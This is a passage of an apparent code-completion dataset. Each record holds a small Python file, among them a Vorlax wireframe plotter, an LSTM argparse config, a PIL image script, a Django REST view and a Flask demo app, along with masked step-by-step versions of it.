-1 * panelData[:, 2]\ny = np.concatenate((y, negativey), axis=0)\nz = panelData[:, 3]\nax.set_aspect('equal')\nmax_range = np.array([x.max() - x.min(), y.max() - y.min(), z.max() - z.min()]\n ).max() / 2.0\nmid_x = (x.max() + x.min()) * 0.5\nmid_y = (y.max() + y.min()) * 0.5\nmid_z = (z.max() + z.min()) * 0.5\nax.set_xlim(mid_x - max_range, mid_x + max_range)\nax.set_ylim(mid_y - max_range, mid_y + max_range)\nax.set_zlim(mid_z - max_range, mid_z + max_range)\nplt.show()\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nVorRun\r\n\r\nRuns Vorlax and plots wireframe output from Vorlax\r\n(https://github.com/GalaxyHobo/VORLAX)\r\n\r\nNOTE! Type: \"%matplotlib auto\" in iPython console to \r\nswitch to interactive plots, or \"%matplotlib inline\" \r\nto switch to inline, in the console.\r\n\r\nNOTE! Reads path to Vorlax .exe in \"path.txt\" file that resides in\r\nsame directory as vorRun.py. The path in that file must be on the \r\nfirst line and begin with drive letter + colon, or \"\\\". Assumes\r\nC-drive if path begins with \"\\\".\r\n\r\nLance Bays\r\n\"\"\"\r\n\r\nimport os\r\nfrom mpl_toolkits.mplot3d import axes3d\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# Establish working directory with exe...\r\n# Copy & paste absolute path on Local machine here within double quotes\r\n\r\n# Read path to working directory\r\nfout = open(\"path.txt\", 'r')\r\nuserExePath=fout.readline()\r\nfout.close()\r\n\r\n# Split drive Letter from path\r\ndrive, exePath = userExePath.split(\"\\\\\", 1)\r\n\r\n# Handle case where user doesn't include drive in path —\r\n# we will assume it's on the C drive. \r\nif not drive: drive=\"C:\"\r\n\r\n# Run program\r\n# Command-line instructions to change drive & directory, and run program \r\nrunString = drive + \" && cd \\\\\" + exePath + \" && vorlax.exe\" \r\nos.system(\trunString)\r\n\r\n# Read output file\r\nfout = open(drive + \"\\\\\" + exePath + \"\\\\VORLAX.WIRE\", 'r')\r\nlines=fout.readlines()\r\nfout.close()\r\n\r\n# Convert to numpy array \r\npanelData=[]\r\nfor index, line in enumerate(lines):\r\n panelData.append(np.array(list(map(float,lines[index].split()))))\r\npanelData=np.array(panelData)\r\n\r\n# Determine array of unique panel ID's\r\npanelNums = np.unique(panelData[0:,0:1])\r\n\r\n# Add subplot\r\nfig = plt.figure()\r\nax = fig.add_subplot(111, projection='3d')\r\n\r\n# Plot the Vorlax wireframe\t(one side)\r\nfor index in panelNums:\r\n ax.plot_wireframe(\r\n panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])],\r\n panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])],\r\n panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])])\r\n\r\n# Plot the mirror image (if symmetry is indicated in wire file)\r\nfor index in panelNums:\r\n symFlag=panelData[panelData[:,0]==index][0,np.array([False,False,False,False,True])]\r\n if symFlag==0 or symFlag==2:\r\n ax.plot_wireframe(\r\n panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])],\r\n -1*panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])],\r\n panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])])\r\n\r\n# Format plot\r\nax.grid()\r\nax.set(ylabel='y-in',\r\n xlabel='x-in',\r\n zlabel='z-in',\r\n title='')\r\nax.xaxis.label.set_size(16)\r\nax.yaxis.label.set_size(16)\r\nax.zaxis.label.set_size(16)\r\n\r\n# Create super-set of data to establish ranges \r\nx=panelData[:,1]\r\ny=panelData[:,2]\r\nnegativey = -1 * panelData[:,2]\r\n\r\ny=np.concatenate((y, negativey), axis=0)\r\nz=panelData[:,3]\r\n\r\n# Set equal scales on axes\r\nax.set_aspect('equal')\r\n\r\n# Set ranges for plot\r\nmax_range = np.array([x.max() - x.min(),\r\n y.max() - y.min(),\r\n z.max() - z.min()]).max() / 2.0\r\n\r\n# Compute midpoints in each direction \r\nmid_x = (x.max() + x.min()) * 0.5 \r\nmid_y = (y.max() + y.min()) * 0.5\r\nmid_z = (z.max() + z.min()) * 0.5\r\n\r\n# Set final ranges\r\nax.set_xlim(mid_x - max_range, mid_x + max_range)\r\nax.set_ylim(mid_y - max_range, mid_y + max_range)\r\nax.set_zlim(mid_z - max_range, mid_z + max_range)\r\nplt.show()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#-*- coding: utf-8 -*- import argparse import pickle def str2bool(v): return v.lower() in ('true', '1') arg_lists = [] parser = argparse.ArgumentParser() def add_argument_group(name): arg = parser.add_argument_group(name) arg_lists.append(arg) return arg # Network net_arg = add_argument_group('Network') net_arg.add_argument('--num_steps', type=int, default=150, help='') net_arg.add_argument('--cell_size', type=int, default=700, help='') net_arg.add_argument('--hyper_size', type=int, default=400, help='') net_arg.add_argument('--embed_size', type=int, default=128, help='') net_arg.add_argument('--hidden_size', type=int, default=256, help='') net_arg.add_argument('--num_layers', type=int, default=2, help='') net_arg.add_argument('--fast_layers', type=int, default=2, help='') net_arg.add_argument('--zoneout_c', type=float, default=0.5, help='') net_arg.add_argument('--zoneout_h', type=float, default=0.9, help='') net_arg.add_argument('--keep_prob', type=float, default=0.65, help='') net_arg.add_argument('--input_dim', type=int, default=300, help='') net_arg.add_argument('--num_glimpse', type=int, default=1, help='') net_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True, help='Not implemented yet') # Data data_arg = add_argument_group('Data') data_arg.add_argument('--task', type=str, default='ptb') data_arg.add_argument('--batch_size', type=int, default=128) data_arg.add_argument('--vocab_size', type=int, default=50) data_arg.add_argument('--input_size', type=int, default=300) data_arg.add_argument('--min_data_length', type=int, default=5) data_arg.add_argument('--max_data_length', type=int, default=80) data_arg.add_argument('--train_num', type=int, default=1000000) data_arg.add_argument('--valid_num', type=int, default=1000) data_arg.add_argument('--test_num', type=int, default=1000) # Training / test parameters train_arg = add_argument_group('Training') train_arg.add_argument('--is_train', type=str2bool, default=True, help='') train_arg.add_argument('--optimizer', type=str, default='rmsprop', help='') train_arg.add_argument('--max_epoch', type=int, default=200, help='') train_arg.add_argument('--max_max_epoch', type=int, default=200, help='') train_arg.add_argument('--max_step', type=int, default=1000000, help='') train_arg.add_argument('--init_scale', type=float, default=0.002, help='') train_arg.add_argument('--lr_start', type=float, default=0.01, help='') train_arg.add_argument('--lr_decay_step', type=int, default=5000, help='') train_arg.add_argument('--lr_decay_rate', type=float, default= 0.1, help='') train_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='') train_arg.add_argument('--checkpoint_secs', type=int, default=300, help='') # Misc misc_arg = add_argument_group('Misc') misc_arg.add_argument('--log_step', type=int, default=2, help='') misc_arg.add_argument('--num_log_samples', type=int, default=3, help='') misc_arg.add_argument('--log_level', type=str, default='INFO', choices=['INFO', 'DEBUG', 'WARN'], help='') misc_arg.add_argument('--log_dir', type=str, default='logs') misc_arg.add_argument('--data_dir', type=str, default='data') misc_arg.add_argument('--output_dir', type=str, default='outputs') misc_arg.add_argument('--data_path', type=str, default='/Ujjawal/fast-slow-lstm/data' ) misc_arg.add_argument('--debug', type=str2bool, default=False) misc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0) misc_arg.add_argument('--random_seed', type=int, default=123, help='') def get_config(): config, unparsed = parser.parse_known_args() return config
normal
{ "blob_id": "dfaea1687238d3d09fee072689cfdea392bc78f9", "index": 8967, "step-1": "<mask token>\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\n<mask token>\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\n<mask token>\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\n<mask token>\n\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n", "step-3": "<mask token>\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\narg_lists = []\nparser = argparse.ArgumentParser()\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\nnet_arg = add_argument_group('Network')\nnet_arg.add_argument('--num_steps', type=int, default=150, help='')\nnet_arg.add_argument('--cell_size', type=int, default=700, help='')\nnet_arg.add_argument('--hyper_size', type=int, default=400, help='')\nnet_arg.add_argument('--embed_size', type=int, default=128, help='')\nnet_arg.add_argument('--hidden_size', type=int, default=256, help='')\nnet_arg.add_argument('--num_layers', type=int, default=2, help='')\nnet_arg.add_argument('--fast_layers', type=int, default=2, help='')\nnet_arg.add_argument('--zoneout_c', type=float, default=0.5, help='')\nnet_arg.add_argument('--zoneout_h', type=float, default=0.9, help='')\nnet_arg.add_argument('--keep_prob', type=float, default=0.65, help='')\nnet_arg.add_argument('--input_dim', type=int, default=300, help='')\nnet_arg.add_argument('--num_glimpse', type=int, default=1, help='')\nnet_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True,\n help='Not implemented yet')\ndata_arg = add_argument_group('Data')\ndata_arg.add_argument('--task', type=str, default='ptb')\ndata_arg.add_argument('--batch_size', type=int, default=128)\ndata_arg.add_argument('--vocab_size', type=int, default=50)\ndata_arg.add_argument('--input_size', type=int, default=300)\ndata_arg.add_argument('--min_data_length', type=int, default=5)\ndata_arg.add_argument('--max_data_length', type=int, default=80)\ndata_arg.add_argument('--train_num', type=int, default=1000000)\ndata_arg.add_argument('--valid_num', type=int, default=1000)\ndata_arg.add_argument('--test_num', type=int, default=1000)\ntrain_arg = add_argument_group('Training')\ntrain_arg.add_argument('--is_train', type=str2bool, default=True, help='')\ntrain_arg.add_argument('--optimizer', type=str, default='rmsprop', help='')\ntrain_arg.add_argument('--max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_step', type=int, default=1000000, help='')\ntrain_arg.add_argument('--init_scale', type=float, default=0.002, help='')\ntrain_arg.add_argument('--lr_start', type=float, default=0.01, help='')\ntrain_arg.add_argument('--lr_decay_step', type=int, default=5000, help='')\ntrain_arg.add_argument('--lr_decay_rate', type=float, default=0.1, help='')\ntrain_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='')\ntrain_arg.add_argument('--checkpoint_secs', type=int, default=300, help='')\nmisc_arg = add_argument_group('Misc')\nmisc_arg.add_argument('--log_step', type=int, default=2, help='')\nmisc_arg.add_argument('--num_log_samples', type=int, default=3, help='')\nmisc_arg.add_argument('--log_level', type=str, default='INFO', choices=[\n 'INFO', 'DEBUG', 'WARN'], help='')\nmisc_arg.add_argument('--log_dir', type=str, default='logs')\nmisc_arg.add_argument('--data_dir', type=str, default='data')\nmisc_arg.add_argument('--output_dir', type=str, default='outputs')\nmisc_arg.add_argument('--data_path', type=str, default=\n '/Ujjawal/fast-slow-lstm/data')\nmisc_arg.add_argument('--debug', type=str2bool, default=False)\nmisc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0)\nmisc_arg.add_argument('--random_seed', type=int, default=123, help='')\n\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n", "step-4": "import argparse\nimport pickle\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\narg_lists = []\nparser = argparse.ArgumentParser()\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\nnet_arg = add_argument_group('Network')\nnet_arg.add_argument('--num_steps', type=int, default=150, help='')\nnet_arg.add_argument('--cell_size', type=int, default=700, help='')\nnet_arg.add_argument('--hyper_size', type=int, default=400, help='')\nnet_arg.add_argument('--embed_size', type=int, default=128, help='')\nnet_arg.add_argument('--hidden_size', type=int, default=256, help='')\nnet_arg.add_argument('--num_layers', type=int, default=2, help='')\nnet_arg.add_argument('--fast_layers', type=int, default=2, help='')\nnet_arg.add_argument('--zoneout_c', type=float, default=0.5, help='')\nnet_arg.add_argument('--zoneout_h', type=float, default=0.9, help='')\nnet_arg.add_argument('--keep_prob', type=float, default=0.65, help='')\nnet_arg.add_argument('--input_dim', type=int, default=300, help='')\nnet_arg.add_argument('--num_glimpse', type=int, default=1, help='')\nnet_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True,\n help='Not implemented yet')\ndata_arg = add_argument_group('Data')\ndata_arg.add_argument('--task', type=str, default='ptb')\ndata_arg.add_argument('--batch_size', type=int, default=128)\ndata_arg.add_argument('--vocab_size', type=int, default=50)\ndata_arg.add_argument('--input_size', type=int, default=300)\ndata_arg.add_argument('--min_data_length', type=int, default=5)\ndata_arg.add_argument('--max_data_length', type=int, default=80)\ndata_arg.add_argument('--train_num', type=int, default=1000000)\ndata_arg.add_argument('--valid_num', type=int, default=1000)\ndata_arg.add_argument('--test_num', type=int, default=1000)\ntrain_arg = add_argument_group('Training')\ntrain_arg.add_argument('--is_train', type=str2bool, default=True, help='')\ntrain_arg.add_argument('--optimizer', type=str, default='rmsprop', help='')\ntrain_arg.add_argument('--max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_step', type=int, default=1000000, help='')\ntrain_arg.add_argument('--init_scale', type=float, default=0.002, help='')\ntrain_arg.add_argument('--lr_start', type=float, default=0.01, help='')\ntrain_arg.add_argument('--lr_decay_step', type=int, default=5000, help='')\ntrain_arg.add_argument('--lr_decay_rate', type=float, default=0.1, help='')\ntrain_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='')\ntrain_arg.add_argument('--checkpoint_secs', type=int, default=300, help='')\nmisc_arg = add_argument_group('Misc')\nmisc_arg.add_argument('--log_step', type=int, default=2, help='')\nmisc_arg.add_argument('--num_log_samples', type=int, default=3, help='')\nmisc_arg.add_argument('--log_level', type=str, default='INFO', choices=[\n 'INFO', 'DEBUG', 'WARN'], help='')\nmisc_arg.add_argument('--log_dir', type=str, default='logs')\nmisc_arg.add_argument('--data_dir', type=str, default='data')\nmisc_arg.add_argument('--output_dir', type=str, default='outputs')\nmisc_arg.add_argument('--data_path', type=str, default=\n '/Ujjawal/fast-slow-lstm/data')\nmisc_arg.add_argument('--debug', type=str2bool, default=False)\nmisc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0)\nmisc_arg.add_argument('--random_seed', type=int, default=123, help='')\n\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n", "step-5": "#-*- coding: utf-8 -*-\nimport argparse\nimport pickle\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\narg_lists = []\nparser = argparse.ArgumentParser()\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\n# Network\nnet_arg = add_argument_group('Network')\nnet_arg.add_argument('--num_steps', type=int, default=150, help='')\nnet_arg.add_argument('--cell_size', type=int, default=700, help='')\nnet_arg.add_argument('--hyper_size', type=int, default=400, help='')\nnet_arg.add_argument('--embed_size', type=int, default=128, help='')\nnet_arg.add_argument('--hidden_size', type=int, default=256, help='')\nnet_arg.add_argument('--num_layers', type=int, default=2, help='')\nnet_arg.add_argument('--fast_layers', type=int, default=2, help='')\nnet_arg.add_argument('--zoneout_c', type=float, default=0.5, help='')\nnet_arg.add_argument('--zoneout_h', type=float, default=0.9, help='')\nnet_arg.add_argument('--keep_prob', type=float, default=0.65, help='')\nnet_arg.add_argument('--input_dim', type=int, default=300, help='')\nnet_arg.add_argument('--num_glimpse', type=int, default=1, help='')\nnet_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True, help='Not implemented yet')\n\n# Data\ndata_arg = add_argument_group('Data')\ndata_arg.add_argument('--task', type=str, default='ptb')\ndata_arg.add_argument('--batch_size', type=int, default=128)\ndata_arg.add_argument('--vocab_size', type=int, default=50)\ndata_arg.add_argument('--input_size', type=int, default=300)\ndata_arg.add_argument('--min_data_length', type=int, default=5)\ndata_arg.add_argument('--max_data_length', type=int, default=80)\ndata_arg.add_argument('--train_num', type=int, default=1000000)\ndata_arg.add_argument('--valid_num', type=int, default=1000)\ndata_arg.add_argument('--test_num', type=int, default=1000)\n\n# Training / test parameters\ntrain_arg = add_argument_group('Training')\ntrain_arg.add_argument('--is_train', type=str2bool, default=True, help='')\ntrain_arg.add_argument('--optimizer', type=str, default='rmsprop', help='')\n\ntrain_arg.add_argument('--max_epoch', type=int, default=200, help='')\ntrain_arg.add_argument('--max_max_epoch', type=int, default=200, help='')\n\n\ntrain_arg.add_argument('--max_step', type=int, default=1000000, help='')\ntrain_arg.add_argument('--init_scale', type=float, default=0.002, help='')\ntrain_arg.add_argument('--lr_start', type=float, default=0.01, help='')\ntrain_arg.add_argument('--lr_decay_step', type=int, default=5000, help='')\ntrain_arg.add_argument('--lr_decay_rate', type=float, default= 0.1, help='')\ntrain_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='')\ntrain_arg.add_argument('--checkpoint_secs', type=int, default=300, help='')\n\n# Misc\nmisc_arg = add_argument_group('Misc')\nmisc_arg.add_argument('--log_step', type=int, default=2, help='')\nmisc_arg.add_argument('--num_log_samples', type=int, default=3, help='')\nmisc_arg.add_argument('--log_level', type=str, default='INFO', choices=['INFO', 'DEBUG', 'WARN'], help='')\nmisc_arg.add_argument('--log_dir', type=str, default='logs')\nmisc_arg.add_argument('--data_dir', type=str, default='data')\nmisc_arg.add_argument('--output_dir', type=str, default='outputs')\nmisc_arg.add_argument('--data_path', type=str, default='/Ujjawal/fast-slow-lstm/data' )\nmisc_arg.add_argument('--debug', type=str2bool, default=False)\nmisc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0)\nmisc_arg.add_argument('--random_seed', type=int, default=123, help='')\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n\n", "step-ids": [ 2, 3, 5, 6, 7 ] }
[ 2, 3, 5, 6, 7 ]
# -*- coding: utf-8 -*- # !/usr/bin/env python3 import pathlib from PIL import Image if __name__ == '__main__': img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve() # image load with Image.open(str(img_path)) as img: # image info print('IMAGE: {}'.format(str(img_path))) print('Image is in {} format'.format(img.format)) print('Image size: width {} pixels, height {} pixels'.format(img.size[0], img.size[1])) print('Image color bands: {}'.format(img.mode)) # image display img.show()
normal
{ "blob_id": "05edbf3662936465eee8eee0824d1a0cca0df0e5", "index": 4855, "step-1": "<mask token>\n", "step-2": "<mask token>\nif __name__ == '__main__':\n img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()\n with Image.open(str(img_path)) as img:\n print('IMAGE: {}'.format(str(img_path)))\n print('Image is in {} format'.format(img.format))\n print('Image size: width {} pixels, height {} pixels'.format(img.\n size[0], img.size[1]))\n print('Image color bands: {}'.format(img.mode))\n img.show()\n", "step-3": "import pathlib\nfrom PIL import Image\nif __name__ == '__main__':\n img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()\n with Image.open(str(img_path)) as img:\n print('IMAGE: {}'.format(str(img_path)))\n print('Image is in {} format'.format(img.format))\n print('Image size: width {} pixels, height {} pixels'.format(img.\n size[0], img.size[1]))\n print('Image color bands: {}'.format(img.mode))\n img.show()\n", "step-4": "# -*- coding: utf-8 -*-\n# !/usr/bin/env python3\n\nimport pathlib\nfrom PIL import Image\n\n\nif __name__ == '__main__':\n\n img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()\n\n # image load\n with Image.open(str(img_path)) as img:\n # image info\n print('IMAGE: {}'.format(str(img_path)))\n print('Image is in {} format'.format(img.format))\n print('Image size: width {} pixels, height {} pixels'.format(img.size[0], img.size[1]))\n print('Image color bands: {}'.format(img.mode))\n # image display\n img.show()\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# -*- coding: utf-8 -*- from rest_framework.views import APIView from ..Models.ConnectToDBModel import * from ..Models.RegionInfoModel import * from .CommonView import * def get_one_spot(region): comments_data = get_comment_data(); data = {}; data['id'] = region.id; data['name'] = region.name; data['address'] = region.address; data['lng'] = region.lng; data['lat'] = region.lat; spot_comment_data = comments_data[(comments_data['search_key'] == str(region.search_key))] data['commentNumber'] = spot_comment_data.iloc[:, 0].size; data['commentScore'] = get_score(spot_comment_data['comment_score'].mean()); return data; def get_spot_list(request): #进行解码token # username = decodeToken(request); # print(username); res = {}; try: list = [get_one_spot(region) for region in regioninfo.objects]; # 返回所有的文档对象列表 res['list'] = list; return json_response(res); except Exception: return json_error(error_string='查询发生错误',code = 12,api = "spotlist"); class SpotListView(APIView): def get(self, request, *args, **kwargs): try: return get_spot_list(request); except KeyError: return json_error(error_string="请求错误", code=500);
normal
{ "blob_id": "0b0b22043dda94ea57344fb3bf47255ad85c7f5b", "index": 1408, "step-1": "<mask token>\n\n\nclass SpotListView(APIView):\n <mask token>\n", "step-2": "<mask token>\n\n\ndef get_one_spot(region):\n comments_data = get_comment_data()\n data = {}\n data['id'] = region.id\n data['name'] = region.name\n data['address'] = region.address\n data['lng'] = region.lng\n data['lat'] = region.lat\n spot_comment_data = comments_data[comments_data['search_key'] == str(\n region.search_key)]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean())\n return data\n\n\n<mask token>\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n return get_spot_list(request)\n except KeyError:\n return json_error(error_string='请求错误', code=500)\n", "step-3": "<mask token>\n\n\ndef get_one_spot(region):\n comments_data = get_comment_data()\n data = {}\n data['id'] = region.id\n data['name'] = region.name\n data['address'] = region.address\n data['lng'] = region.lng\n data['lat'] = region.lat\n spot_comment_data = comments_data[comments_data['search_key'] == str(\n region.search_key)]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean())\n return data\n\n\ndef get_spot_list(request):\n res = {}\n try:\n list = [get_one_spot(region) for region in regioninfo.objects]\n res['list'] = list\n return json_response(res)\n except Exception:\n return json_error(error_string='查询发生错误', code=12, api='spotlist')\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n return get_spot_list(request)\n except KeyError:\n return json_error(error_string='请求错误', code=500)\n", "step-4": "from rest_framework.views import APIView\nfrom ..Models.ConnectToDBModel import *\nfrom ..Models.RegionInfoModel import *\nfrom .CommonView import *\n\n\ndef get_one_spot(region):\n comments_data = get_comment_data()\n data = {}\n data['id'] = region.id\n data['name'] = region.name\n data['address'] = region.address\n data['lng'] = region.lng\n data['lat'] = region.lat\n spot_comment_data = comments_data[comments_data['search_key'] == str(\n region.search_key)]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean())\n return data\n\n\ndef get_spot_list(request):\n res = {}\n try:\n list = [get_one_spot(region) for region in regioninfo.objects]\n res['list'] = list\n return json_response(res)\n except Exception:\n return json_error(error_string='查询发生错误', code=12, api='spotlist')\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n return get_spot_list(request)\n except KeyError:\n return json_error(error_string='请求错误', code=500)\n", "step-5": "# -*- coding: utf-8 -*-\nfrom rest_framework.views import APIView\nfrom ..Models.ConnectToDBModel import *\nfrom ..Models.RegionInfoModel import *\nfrom .CommonView import *\n\n\n\ndef get_one_spot(region):\n\n comments_data = get_comment_data();\n\n data = {};\n data['id'] = region.id;\n data['name'] = region.name;\n data['address'] = region.address;\n data['lng'] = region.lng;\n data['lat'] = region.lat;\n spot_comment_data = comments_data[(comments_data['search_key'] == str(region.search_key))]\n data['commentNumber'] = spot_comment_data.iloc[:, 0].size;\n data['commentScore'] = get_score(spot_comment_data['comment_score'].mean());\n return data;\ndef get_spot_list(request):\n #进行解码token\n # username = decodeToken(request);\n # print(username);\n res = {};\n try:\n\n list = [get_one_spot(region) for region in regioninfo.objects];\n # 返回所有的文档对象列表\n res['list'] = list;\n return json_response(res);\n except Exception:\n return json_error(error_string='查询发生错误',code = 12,api = \"spotlist\");\n\n\n\nclass SpotListView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n\n return get_spot_list(request);\n except KeyError:\n return json_error(error_string=\"请求错误\", code=500);\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
class player: def __init__(self, name: str, symbol: str): self._name = name self._symbol = symbol def decide_next_move(self): """ Checks all possible combinations to decide best next move :return: board position """ pass def get_next_move(self): """ Asks user for next move :return: board position """ return int(input('Enter your move: '))
normal
{ "blob_id": "3cc894570189fe545f5db3150d0b69c16dc211dc", "index": 981, "step-1": "class player:\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "class player:\n\n def __init__(self, name: str, symbol: str):\n self._name = name\n self._symbol = symbol\n <mask token>\n <mask token>\n", "step-3": "class player:\n\n def __init__(self, name: str, symbol: str):\n self._name = name\n self._symbol = symbol\n <mask token>\n\n def get_next_move(self):\n \"\"\"\n Asks user for next move\n :return: board position\n \"\"\"\n return int(input('Enter your move: '))\n", "step-4": "class player:\n\n def __init__(self, name: str, symbol: str):\n self._name = name\n self._symbol = symbol\n\n def decide_next_move(self):\n \"\"\"\n Checks all possible combinations to decide best next move\n :return: board position\n \"\"\"\n pass\n\n def get_next_move(self):\n \"\"\"\n Asks user for next move\n :return: board position\n \"\"\"\n return int(input('Enter your move: '))\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
#-*- coding = utf-8-*- #@Time : 2020/6/26 11:02 #@Author :Ella #@File :app.py #@Software : PyCharm import time import datetime from flask import Flask,render_template,request #render_template渲染模板 app = Flask(__name__) #初始化的对象 #路由解析,通过用户访问的路径,匹配想要的函数 @app.route('/') def hello_world(): return '你好' #通过访问路径,获取用户的字符串参数 @app.route('/test1/<name>') def test1(name): return '你好,%s'%name #通过访问路径,获取用户的整形参数 此外,还有float类型 @app.route('/test2/<int:id>') def test2(id): return '你好,%d'%id #返回给用户渲染后的网页文件 # @app.route('/index1') # def index1(): # return render_template("index.html") #向页面传递变量 @app.route('/index1') def index2(): time = datetime.date.today() #普通变量 name = ['小新','小英','小红'] #列表类型 task = {"任务":"打扫卫生","时间":"3小时"} #字典类型 return render_template("index.html",var = time,list = name,task = task) #表单提交 @app.route('/test/register') def register(): return render_template("test/register.html") #接受表单提交的路由,需要指定methods为post @app.route('/result',methods = ['POST','GET']) def result(): if request.method == 'POST': result = request.form return render_template("test/result.html",result = result) if __name__ == '__main__': app.run(debug=True)
normal
{ "blob_id": "d68bd9c90a106a9eac767607ad77bdd84d0f18d2", "index": 1006, "step-1": "<mask token>\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\n<mask token>\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\[email protected]('/index1')\ndef index2():\n time = datetime.date.today()\n name = ['小新', '小英', '小红']\n task = {'任务': '打扫卫生', '时间': '3小时'}\n return render_template('index.html', var=time, list=name, task=task)\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\[email protected]('/index1')\ndef index2():\n time = datetime.date.today()\n name = ['小新', '小英', '小红']\n task = {'任务': '打扫卫生', '时间': '3小时'}\n return render_template('index.html', var=time, list=name, task=task)\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "import time\nimport datetime\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\n\n\[email protected]('/')\ndef hello_world():\n return '你好'\n\n\[email protected]('/test1/<name>')\ndef test1(name):\n return '你好,%s' % name\n\n\[email protected]('/test2/<int:id>')\ndef test2(id):\n return '你好,%d' % id\n\n\[email protected]('/index1')\ndef index2():\n time = datetime.date.today()\n name = ['小新', '小英', '小红']\n task = {'任务': '打扫卫生', '时间': '3小时'}\n return render_template('index.html', var=time, list=name, task=task)\n\n\[email protected]('/test/register')\ndef register():\n return render_template('test/register.html')\n\n\[email protected]('/result', methods=['POST', 'GET'])\ndef result():\n if request.method == 'POST':\n result = request.form\n return render_template('test/result.html', result=result)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "#-*- coding = utf-8-*-\n#@Time : 2020/6/26 11:02\n#@Author :Ella\n#@File :app.py\n#@Software : PyCharm\n\nimport time\nimport datetime\n\nfrom flask import Flask,render_template,request #render_template渲染模板\napp = Flask(__name__) #初始化的对象\n\n#路由解析,通过用户访问的路径,匹配想要的函数\[email protected]('/')\ndef hello_world():\n return '你好'\n\n#通过访问路径,获取用户的字符串参数\[email 